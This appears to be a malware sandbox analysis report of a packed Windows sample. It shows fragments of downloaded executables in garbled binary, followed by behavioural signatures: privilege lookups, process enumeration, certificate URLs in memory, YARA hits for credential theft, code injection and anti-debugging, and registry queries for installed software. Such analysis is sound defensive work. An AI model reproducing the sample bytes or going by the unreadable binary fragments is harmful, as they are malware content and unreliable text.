è#¸ðúuì}ðéþgUìì$èÖFEÜhjEPè¹HÄè»FEø}øåy3ÀéÎSÏ]è_ã®6zUììSQè*h6ÊÛ0Pèý4Eôÿuÿuè7XH+Ë]üMøÿuÿuÿuøÿuüÿUôY[å]ÂÇEÀéárEé±ÿ%D0AUììÀÇDþÿÿÇEüë EüÀEü}üksMüÇHþÿÿëáÇ request_handle: 0x0000000000cc005c	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEd â_3fð#,Ê`ú@À¥ 06d¥X,Y¥ü*(ÀW¥8°÷h.text¶~ `.rdatað@@.dataÈæÉ°@À.pdata Ê@@.00cfg°Ê@@.tlsÀÊ@À.text0ìÓ,ÐÊ `.text18°÷ @À.text2üÃÀ÷Ä`h.rsrcX,¥.Ò@@ÊjjEfÌºD_ñ÷êý0,¶ request_handle: 0x0000000000cc00e8	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^BàF$°@@@ÐP ,ðCODED `DATAL°@ÀBSSHÀÀ.idataP Ð @À.tlsà¦À.rdatað¦@P.reloc´@P.rsrc,,¨@P@Þ@P string<@m@Ä)@¬(@Ô(@)@$)@Free0)@InitInstanceL)@CleanupInstanceh(@ ClassTypel(@ ClassName(@ClassNameIs¨(@ClassParentÀ)@ ClassInfoø(@InstanceSize°)@InheritsFromÈ)@Dispatchð)@ MethodAddress<@ MethodNamex*@FieldAddressÄ)@DefaultHandler¬(@NewInstanceÔ(@FreeInstanceTObject@Ã@ÿ% Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%(Ñ@Àÿ%Ñ@Àÿ%Ñ@Àÿ%üÐ@Àÿ%øÐ@Àÿ%ôÐ@Àÿ%ðÐ@Àÿ%ìÐ@Àÿ%èÐ@Àÿ%äÐ@Àÿ%àÐ@Àÿ%ÜÐ@Àÿ%ØÐ@Àÿ%ÔÐ@Àÿ%@Ñ@Àÿ%<Ñ@Àÿ%8Ñ@Àÿ%4Ñ@Àÿ%0Ñ@Àÿ%ÐÐ@Àÿ%ÌÐ@Àÿ%ÈÐ@Àÿ%ÄÐ@Àÿ%ÀÐ@Àÿ%¼Ð@Àÿ%¸Ð@Àÿ%´Ð@ÀSV¾8Ä@>u:hDjè¨ÿÿÿÈÉu3À^[Ã¡4Ä@ 4Ä@3ÒÂÀDÁBúduì^[Ã@ÃÀSVòØèÿÿÿÀu3À^[ÃPVPXB°^[ÃP Q8Ä@£8Ä@ÃSVWUQñ$è]$PV;CÐS;uÃè·ÿÿÿCCFëV;Âu ÃèÿÿÿCFß;ëuÂÖÅèUÿÿÿÀu3ÀZ]_^[Ã@SVWUÄøØû2C;ðrlÎJèk;Íw^;ðuBCB)C{uDÃè5ÿÿÿë; rÎø{;Ïu)së& J$+ù request_handle: 0x0000000000cc00cc	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $jä.øs·.øs·.øs·ep¶%øs·ev¶îøs·et¶/øs·ìy·øs·ìyw¶=øs·ìyp¶4øs·ìyv¶uøs·ew¶6øs·eu¶/øs·er¶5øs·.ør·ùs·Ýzz¶2øs·Ýz·/øs·.øä·/øs·Ýzq¶/øs·Rich.øs·PELiLfà'¼\|l3´Ð@P´@ PPT_°`0PPÀ< @àÐ@ @àPPB @à J @à ÀbJ @à.rsrc `¬ @@ x(Æ @à.data0" "î @àê]_%ixLëuç¨R»·\|wïE GÈûM=aÓ^>ÑWÉF£ywV."Í´>§H°{W ïÔecjAÎÃ-pçJ51<2O®ª2ØÐÔÑ°µ\|Áö-äý%"/íªHâS]ªSÇ·Ô>G~oÒèÿvÓLõT)èEBR©Ä3CwWã«Bw ârúKtÐzmtç R6¥bß"-!Acè×2ÅçF¬=-_/Öl.p»pm{w,×uqýãièÊwq¶¨º®nF½'¡'u l·P´{If+'?4ª¸:õ¾Â¶ìúY\|J¼G6Usñ¼\|m XGõê-ûÑÄÍ¹ç¨,Ô2Æa±>àÈ]×ÓSÆneÈÏ/W0ª<StºhÁj8+µëÓýÖ8entÔ%¨{Ç5uñ³ÕÒqgmN«Ä¶á~Zæ#:& «ðG¢i¾Y2P° ;ð¼ýå5iÏÓç!_ÊÍveàTÒ·EBïPAãÀâ$PÒËô ¹³PÜ[½u9q±¦]ê+¶õÍý5 ðR¾ÏyL°â½tÊ5¤Ìg';=LG¯ýRFNgG3Â ãÙÀB5# H¤3ê(à¯_ OÈ¿Ou·ÄKÆ¼ëõß¯ôqä×ã¥O¿lÅÁê%\|Ìà F§ÛÌsë'd>®[³õø>Ý&ÐTÄü_ÌÚØåØRKäQÃ:eÏÜC(HV¡Úé#µQÓ ÎM{ qEZ+×Ò;WR·ülîÍþÒ>ÁïoìKDËÕÆÜ¥¼ÿz¬sðcñ+ "dVsÎuï=üÚy4àgËï/¢¬ª$¢lvXÜZ÷IôZy\»Æ£9#-WM¼äû Eìx+ôçY¨5+öõ ûÆÍ¥ÿ}ê!<TZ±Ü;YÝ©4ÞBåÅié\| ï4<Mtnò®$òsELyhCn3È~çÙ<ÀbPfYs$Ç·5ívjôàÝ5`j7Ç@ÆÇgmçÐ¹ªÐ2Á1¯Ù¨7}òÎCUþ@%/JÏÁ ~ Î[zZHù\,»$ <5¥m(5QÖ§ ¨sQ1Ù[Za§üÀ3ûÄ·b$+ 7VpÆ(¡!<v}3¹\Áå[þuSåWTDè°N5ku¿èZëdGÈ&xÁ¢^»lØ*Nöãñ2jú©>.ÕÒÁ'áq request_handle: 0x0000000000cc0044	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $v¸p2Ùb#2Ùb#2Ùb#E#?Ùb#E#¾Ùb#E#Ùb#²¢#0Ùb#²¢f"!Ùb#²¢a"Ùb#²¢g"Ùb#;¡á#9Ùb#;¡ñ#5Ùb#2Ùc#,Øb#¼¢g"Ùb#¼¢b"3Ùb#¼¢#3Ùb#¼¢`"3Ùb#Rich2Ùb#PEL<oeà!¤¶eÀ@ @Áp}4¤}P`ãpüETFXì@À,r .textl¢¤ `.rdataøËÀÌ¨@@.dataà×t@À.didat¨p@À.rsrc`ãä@@.relocüp,l@Bhp DèHpÃÌÌÌÌÌ¹ÈàDéÌÌÌÌÌÌ¹àDè-h ±Cè5OYÃÌÌÌÌÌÌÌÌÌÌh°±CèOYÃÌÌÌÌè¶Z£REÃÌÌÌÌÌ¹ REécvÌÌÌÌÌÌhÐ±CèïNYÃÌÌÌÌhà±CèßNYÃÌÌÌÌ¹ÀSEè}>hð±CèÅNYÃÌÌÌÌÌÌÌÌÌÌh²Cè¯NYÃÌÌÌÌh²CèNYÃÌÌÌÌ¹ÐSEèæh ²CèNYÃÌÌÌÌÌÌÌÌÌÌ¹@SEèæh0²CèeNYÃÌÌÌÌÌÌÌÌÌÌh@²CèONYÃÌÌÌÌ¹XEèÍehP²Cè5NYÃÌÌÌÌÌÌÌÌÌÌh`²CèNYÃÌÌÌÌUìQVWÿu3ÿèÎYMPÿuè6 uÎP>~~è_Æ^ÉÂUìQMVWÿu3ÿèÈ uÎÿu>~~èP_Æ^ÉÂD$=rPèëÀt PèaDYë3ÀÂD$H#;ÈvQèHDYÈÉtA#ààHüÂèØèÌS\$¸þÿÿUé;Øw`jYMûsSÿt$]Uè 3ÀfD]ë9VWPQSèðNQèPè^ÿÿÿSÿt$ø]W}uèÕ3Àf__^][ÂèÌVt$W\|$+\|$Wÿt$VèYÄ7_^ÂUìE=rEPEPèèEPÿuèCYY]ÂD$=ÿÿÿwÀÂè=ÌQS\$Wù¹þÿÿ;Ùw`GUVQPSD$èÂðNQè¼ÿÿÿPèþÿÿSÿt$$è_Uwè3ÀfD]D$ørEPÿ7èXÿÿÿ^/Ç]_[YÂè2ÌQQSÙºþÿÿL$ÂUk+Å;ÁrvCVWR<)D$PWè?ðNQè9ÿÿÿPèþÿÿÿt$({L$$ÿt$(\|$D$sUÿr3VPè¨}PVèÐþÿÿëSPèD$_^Ã][YYÂèÌQQSÙºþÿÿ request_handle: 0x0000000000cc0054	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZÿÿ¸@Øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¨!@ì@öì@öì@ö/O©î@öì@÷O@ö/O«ã@ö¸cÆà@ö+Fðí@öRichì@öPEL_Ü dàj :K6@ ;@ü ;` ¨.texthj `.rdataXn@@.data¸ã9 @À.ndata:À.rsrc` ;@@Uìì\}t+}FEu H ¨zHPÿuÿuÿuÿ\@éBSV5°zE¤WPÿuÿ`@eôEEäPÿuÿd@}ðeðT@é¶FR¶VV¯UèÏ+Mè¯ÁÂM÷ÿ3Òð¶FQ¯Á¶NU¯MèÁÊ÷ÿ¶VT¯UèÈ¶FP¯EÂ÷ÿÁá¶ÀÈEôPMøÿX@EðEPEäPÿuÿh@ÿuÿÓEè9}èwÿÿÿ~Xÿteÿv4ÿ\@ÀEtU}jWÇEäÇEèÿ`@ÿvXWÿd@ÿu5P@WÿÖEEäh Pjÿh rzWÿl@ÿuWÿÖÿuÿÓE¤Pÿuÿp@_^3À[ÉÂL$¡ÈzÑSiÒVWTöÂtOq3ÿ;5ÌzsBÎiÉDöÁtGëöÁt ÏOÉt ëöÁuÙ3Úã3ÙF;5ÌzrÊ_^[ÂUìQQUSVòiöÈz3ÉóWMüMøF¨t9Mt$¾BF;ÌzsDÂiÀ\|BöÁt jRè¥ÿÿÿöÁu(öÁ@tÿEüöÁtÿEüëÿEø;ÌzÐr¼3À_^[ÉÂ}ütó}øtN@ëçNáÉNëÙL$¡ÈzV3öù s495Ìzv,PW¨u3ÿGÓçzütë$þFÂ;5ÌzrÙ_^ÂUìì¡°zeüSVW=ÌzEøEø3Û9tK;ßsE5ÈzÆöÂu(EÀt<tMü3À@âÓàNü#ÈÁMüÓâ;ÂuCÆ;ßrÆ;ßt ÿEüEø}ü rEü_^[ÉÂD$À}@¹zÁà+ÈQèbRÂVt$ëjÆ ÐzkÀÁ8t\Pè=ÿÿÿtUPè¸ÿÿÿÀu@FëHÎð+Á\|$t/rzjÿ5trzh0uÿ5rzÿH@Phÿt$ÿX@ö}3À request_handle: 0x0000000000cc00a8	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL\|`Xfàâ: Î; ;@ `;@;K ;X@;4; H.textÔà: â: `.rsrcX ;ä:@@.reloc@;;@B°;HÜ hdQDù®ø$:( 8&~þ~>( 8&~þ~0p8MþE 8s :Ýÿÿÿ&8Óÿÿÿs 8s 8Åÿÿÿs 8s 8Äÿÿÿ0$8 8øÿÿÿ8óÿÿÿ~o! 8äÿÿÿ0$8~o" 88æÿÿÿ8áÿÿÿ0~o# 8880$8 8øÿÿÿ8óÿÿÿ~o$ 8äÿÿÿ0$8 88~o% 8äÿÿÿ&~þ~0d þ8þE+8&{ (+} (9Îÿÿÿ&8Äÿÿÿ{ 8880y8XþE)8$9- (:Üÿÿÿ& 8Ñÿÿÿ (s& z\| o+8Ûÿÿÿ{ @®ÿÿÿ88Åÿÿÿ8ÿÿÿ0&9þo' 9ý~ 9:~ Ð(( o) 9 J(ö(* s+ z8s, ~ Ð(( o- (+ ÝÝu?%:&8%(/ o0 þþþþ& (ö o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8¿?yþ0 þo5 þ>(6 80& 8 88(7 (8 8ßÿÿÿ0 8 88(8åÿÿÿ0)8 8øÿÿÿ8óÿÿÿ (f(( 8ßÿÿÿ0 8(9 88êÿÿÿ8åÿÿÿ&~þ~.þ (öþ (: 0& 8 8øÿÿÿ8óÿÿÿ(7 (8 8âÿÿÿ0(: 8880)8 *8øÿÿÿ8óÿ request_handle: 0x0000000000cc001c	1	1
InternetReadFile May 31, 2024, 7:34 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÈ^Xfàö: >; ;@ `;@ð;K ;@;; H.textDô: ö: `.rsrc ;ø:@@.reloc@;;@B ;H hhV\|ý×%:( 8&~þ~>( 8&~þ~0} þ8þE/8s 9Ùÿÿÿ&8Ïÿÿÿs 8s 8s 8s 8Âÿÿÿ0$8~o! 88æÿÿÿ8áÿÿÿ0~o" 8880~o# 88øÿÿÿ8óÿÿÿ0$8 88~o$ 8äÿÿÿ0$8 88~o% 8äÿÿÿ&~þ~0i þ8þE:858=88{ (+} (9Äÿÿÿ& 8¹ÿÿÿ{ 8¾ÿÿÿ0y8þE$8{ @288çÿÿÿ8" (s& z\| o+8¿ÿÿÿ9çÿÿÿ (9ÿÿÿ& 8ÿÿÿ0&9þo' 9ý~ 9:~ Ð(( o) 9 J(ã( s+ z8s, ~ Ð(( o- (+ ÝÝu?%:&8%(/ o0 þþþþ& (ã o0 o1 ¢ (* o0 s2 z(3 Ý~ Ð(( o4 Ü8 8¿?yþ0 þo5 þ>(6 80! (7 (8 8880 8 8øÿÿÿ8óÿÿÿ(8èÿÿÿ0$ (S(8880 8 8øÿÿÿ8óÿÿÿ(9 8èÿÿÿ&~þ~.þ (ãþ (: .þ (( 0& 8 8øÿÿÿ8óÿÿÿ(7 (8 8âÿÿÿ0 8 88(: 8èÿÿÿ*0 request_handle: 0x0000000000cc00bc	1	1

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x0002d800', u'virtual_address': u'0x00001000', u'entropy': 7.9843440745598455, u'name': u' \\x00 ', u'virtual_size': u'0x00066000'}

entropy

7.98434407456

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001a6400', u'virtual_address': u'0x0031d000', u'entropy': 7.953929634415556, u'name': u'epnjyyts', u'virtual_size': u'0x001a7000'}

entropy

7.95392963442

description

A section with a high entropy has been found

entropy

0.994155154091

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (26 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 31, 2024, 7:23 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:23 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:24 a.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:33 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:34 a.m.	system_name: privilege_name: SeLoadDriverPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:34 a.m.	system_name: privilege_name: SeAssignPrimaryTokenPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:34 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 31, 2024, 7:35 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (22 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0
Process32NextW May 31, 2024, 7:34 a.m.	snapshot_handle: 0x00000588 process_name: process_identifier: 0		0	0

Potentially malicious URLs were found in the process memory dump (49 events)

url	https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation
url	http://s.symcb.com/universal-root.crl0
url	http://crl.globalsign.com/root-r6.crl0G
url	http://crl.globalsign.com/codesigningrootr45.crl0U
url	http://ocsp.verisign.com0
url	https://www.verisign.com/rpa
url	http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
url	http://ns.adobe.com/xap/1.0/sType/ResourceRef
url	http://ocsp2.globalsign.com/rootr606
url	http://s1.symcb.com/pca3-g5.crl0
url	http://www.symauth.com/cps0(
url	http://ocsp.globalsign.com/ca/gstsacasha384g40C
url	http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
url	http://crl.globalsign.com/ca/gstsacasha384g4.crl0
url	http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
url	http://s2.symcb.com0
url	https://d.symcb.com/cps0%
url	http://sv.symcb.com/sv.crl0a
url	http://s.symcd.com06
url	http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
url	http://crl.verisign.com/pca3-g5.crl04
url	https://www.globalsign.com/repository/0
url	http://logo.verisign.com/vslogo.gif04
url	http://ns.adobe.com/xap/1.0/mm/
url	http://crl.globalsign.net/root.crl0
url	https://d.symcb.com/rpa0
url	https://www.verisign.com/cps0
url	http://sv.symcb.com/sv.crt0
url	http://ocsp.globalsign.com/codesigningrootr450F
url	http://sf.symcb.com/sf.crl0a
url	http://ocsp2.globalsign.com/rootr306
url	http://crl.globalsign.com/root-r3.crl0G
url	http://www.360safe.com0
url	https://www.globalsign.com/repository/03
url	https://d.symcb.com/rpa0.
url	http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
url	http://ns.adobe.com/xap/1.0/
url	http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
url	http://www.symauth.com/rpa00
url	http://sf.symcb.com/sf.crt0
url	https://www.verisign.com/rpa0
url	http://sv.symcd.com0
url	http://secure.globalsign.com/cacert/gstimestampingg2.crt0
url	http://www.openssl.org/support/faq.html
url	http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
url	http://crl.globalsign.com/gs/gstimestampingg2.crl0T
url	http://sf.symcd.com0
url	http://ts-ocsp.ws.symantec.com0
url	http://www.winimage.com/zLibDll

Yara rule detected in process memory (45 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Steal credential	rule	local_credential_Steal
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 264 events)

Time & API	Arguments	Status
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000554 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: 7-Zip base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: AddressBook base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Adobe AIR base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Connection Manager base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: DirectDrawEx base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: EditPlus base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Fontcore base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Google Chrome base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: IE40 base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: IE4Data base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: IE5BAKEX base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: IEData base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: MobileOptionPack base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW May 31, 2024, 7:30 a.m.	regkey_r: SchedulingAgent base_handle: 0x00000554 key_handle: 0x00000558 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
